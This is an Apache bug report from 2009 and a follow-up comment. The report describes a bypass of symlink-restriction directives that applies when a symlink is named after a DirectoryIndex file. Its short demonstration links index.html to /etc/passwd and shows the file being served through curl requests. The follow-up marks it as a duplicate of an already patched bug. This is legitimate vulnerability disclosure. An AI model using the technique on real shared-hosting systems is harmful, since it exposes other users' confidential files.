Apache ignores SymLinksIfOwnerMatch- and FollowSymlinks-directives if the name of the symlink in question matches a valid value for DirectoryIndex. Expected behaviour: 403 Forbidden, the symlink's target should not be delivered. Observed behaviour: 200 OK, the symlink's target is delivered to the client. Impact: this could prove a security problem, especially in shared hosting environments. It is possible to disclose confidential information by arbitrarily creating symlinks to files readable by the apache process. Demonstration: --- snip --- xy@v1384:~/dev/test$ ls -la . /etc/passwd -rw-r--r-- 1 root root 1570 2009-03-23 11:06 /etc/passwd .: total 3 drwxr-xr-x 2 xy xy 1024 2009-06-09 16:50 . drwxr-xr-x 5 xy xy 1024 2009-06-09 16:31 .. -rw-r--r-- 1 xy xy 29 2009-06-09 16:48 .htaccess lrwxrwxrwx 1 xy xy 11 2009-06-09 16:47 index.html -> /etc/passwd lrwxrwxrwx 1 xy xy 11 2009-06-09 16:50 symlink -> /etc/passwd xy@v1384:~/dev/test$ cat .htaccess Options SymLinksIfOwnerMatch xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/symlink HTTP/1.1 403 Forbidden Date: Tue, 09 Jun 2009 15:36:52 GMT Server: Apache Content-Type: text/html; charset=iso-8859-1 xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/index.html HTTP/1.1 403 Forbidden Date: Tue, 09 Jun 2009 15:37:00 GMT Server: Apache Content-Type: text/html; charset=iso-8859-1 xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/ HTTP/1.1 200 OK Date: Tue, 09 Jun 2009 15:37:03 GMT Server: Apache Last-Modified: Mon, 23 Mar 2009 10:06:27 GMT ETag: "f979d3e-622-465c66b6bcec0" Accept-Ranges: bytes Content-Length: 1570 Content-Type: text/html --- snip --- The above behaviour is the same if FollowSymlinks, instead of SymLinksIfOwnerMatch, is used to restrict access. This is reproducible on Apache 2.2.9 (Debian Stable) and 2.2.11 (Gentoo ~x86).
This looks like a dupe of bug 45959. A patch was applied in r733754 to the 2.2 branch, which should fix the issue since vers. 2.2.12 (not released yet). *** This bug has been marked as a duplicate of bug 45959 ***